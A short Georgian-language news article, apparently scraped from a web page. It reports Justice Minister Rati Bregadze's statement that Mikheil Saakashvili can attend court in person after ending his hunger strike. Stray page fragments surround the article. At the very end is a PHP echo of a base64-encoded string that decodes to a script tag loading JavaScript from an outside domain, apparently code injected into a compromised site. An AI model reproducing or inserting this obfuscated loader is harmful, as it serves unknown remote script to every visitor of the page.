celsiusi
ავერსი საქკაბელი
იუსტიციის მინისტრის, რატი ბრეგაძის განცხადებით, შიმშილობის შეწყვეტის და მიხეილ სააკაშვილის ჯანმრთელობის მდგომარეობის გაუმჯობესების შემდეგ საქართველოს ყოფილი პრეზიდენტისთვის შესაძლებელია საკუთარ სასამართლო პროცესზე ფიზიკურად დასწრება. ამის შესახებ ბრეგაძემ ტელეკომპანია “იმედის” ეთერში განაცხადა.
 
“როგორც უკვე საზოგადოებისთვის ცნობილია, მიხეილ სააკაშვილმა შეწყვიტა შიმშილობა. ჩვენ, რა თქმა უნდა, დაველოდებით ექიმების დასკვნას მისი ჯანმრთელობის მდგომარეობის შესახებ და უკვე ამ ერთი ფაქტორის გამორიცხვა გვაძლევს იმის საფუძველს, რომ მიხეილ სააკაშვილი შემდგომ სასამართლო პროცესზე წარმოდგენილი იყოს სასამართლო დარბაზში…
 
აქ იყო ორი მთავარი ფაქტორი, ერთი – უსაფრთხოება, მეორე – ჯანმრთელობის მდგომარეობა. ჯანმრთელობის მდგომარეობა, რა თქმა უნდა, ჩვენთვის მთავარი ამოსავალი პრინციპია და, ბუნებრივია ეს არის საფუძველთა საფუძველი და აქ ჩვენ თეორიული რისკის არსებობასაც ვერ დავუშვებდით. შესაბამისად, როდესაც ეს რისკი იქნება გამორიცხული, სპეციალური პენიტენციური სამსახური შეძლებს მის გადაყვანას სასამართლო დარბაზში”, – განაცხადა ბრეგაძემ.
 
მისი თქმით, სააკაშვილის ჯანმრთელობის მდგომარეობა ამ ეტაპზე სტაბილური და დამაკმაყოფილებელია.
1024
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");